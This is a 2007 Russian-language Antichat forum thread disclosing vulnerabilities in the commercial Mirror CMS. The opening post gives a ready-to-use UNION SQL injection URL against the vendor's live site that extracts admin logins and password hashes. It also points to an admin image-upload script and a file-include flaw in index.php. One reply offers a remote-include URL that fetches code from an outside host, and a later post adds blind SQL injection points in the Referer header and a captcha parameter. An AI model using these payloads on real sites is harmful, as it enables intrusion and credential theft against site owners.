Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
29.10.2007, 15:48
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
Mirror CMS bugs
by me)
коммерческая платная цмс, производитель
http://mirrorcms.ru
там же представлены все сайты на это цмс
Код:
$sSQL="SELECT ".$suffx."_page.title from _page where _page.id='".$_GET['doc']."'";
select usr_login,usr_password from usertable
Если установлен мод рерайт, то название модуля берем из названия первого каталога ..
Например офф сайт
http://mirrorcms.ru/news/36/
аналогично
http://mirrorcms.ru/?ip=news&doc=36
Код:
http://mirrorcms.ru/?ip=news&doc=-1+union+select+1,2,3,concat(usr_login,char(64),usr_password),5,6,7,8,9+from+usertable/*
md5()
проблема в том что админка при инстале указывается вручную, поэтому стандартно /admin/ встречается на 2-3 сайтах.
Вообще отпадает смысл в скуле, если мы находим админку.. тогда идем в
http://site.com/админка/template/imageload.php
вводим сверху диру где разрешена запись (у меня на 4х сайтах оказалась не просто ?image/ как по дэфолту.. а /stock/images/
и третья уязвиость - локальный инклуд при magic quotes off в index.php
PHP код:
if(file_exists("$ip/docn.php")){
include("$ip/docn.php"); }
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
29.10.2007, 16:37
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
и третья уязвиость - локальный инклуд при magic quotes off в index.php
Больше похоже на удаленный.
|
|
|
|
29.10.2007, 18:22
|
|
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
Провел на форуме:
4325663
Репутация:
240
|
|
Какой же он локальный? Что мешает залить на народ.ру файл docn.php и инклудить так:
Код:
http://[target]/index.php?ip=http://www.hack.narod.ru
|
|
|
|
29.10.2007, 18:48
|
|
Умиротворенн
Регистрация: 09.12.2004
Сообщений: 996
Провел на форуме:
2386719
Репутация:
1384
|
|
Мешает file_exists. Инклуд локальный.
__________________
http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)
http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА
|
|
|
|
29.10.2007, 23:49
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
ммм.. небольшое дополнение..
там же в индексе.. посимвольный (т.к. нет вывода) брут в HTTP_REFERER
Код:
stat.php:
...
$rname=getenv("HTTP_REFERER");
$doc_res=my_query("SELECT * from referer WHERE rname='$rname' AND datein='$datein'");
...
Капча
./img.php
при register_globals on имеем посимвольный брут в параметре id.. кстати.. походу без регистр глобалс сам скрипт не будет работать =)
ЗЫ
маднет прав. file_exist возвращает тру только при наличие файла на локалхосте +\
если попытаться скормить ему любой вид урла, возвращает false
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
